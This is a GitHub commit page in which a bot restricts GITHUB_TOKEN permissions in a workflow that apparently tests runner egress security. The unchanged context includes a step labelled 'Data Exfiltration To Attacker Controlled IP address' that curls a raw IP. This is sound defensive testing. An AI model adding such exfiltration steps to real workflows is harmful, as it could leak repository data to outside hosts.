Skip to content

Commit

Permalink
Restrict permissions for the GITHUB_TOKEN in .github/workflows/arc-se…
Browse files Browse the repository at this point in the history 
…cure-by-default.yml
  • Loading branch information
@step-security-bot
step-security-bot committed Sep 11, 2023
1 parent 5c5d20c commit ff82b8b
Showing 1 changed file with 4 additions and 0 deletions.
4 changes: 4 additions & 0 deletions .github/workflows/arc-secure-by-default.yml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -4,6 +4,8 @@ on:

jobs:
direct-ip-hosted:
permissions:
contents: read
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
Expand All @@ -12,6 +14,8 @@ jobs:
- name: Data Exfiltration To Attacker Controlled IP address
run: curl 104.16.209.12 -L
direct-ip-arc:
permissions:
contents: read
runs-on: self-hosted
steps:
- uses: actions/checkout@v3
Expand Down

0 comments on commit ff82b8b

Please sign in to comment.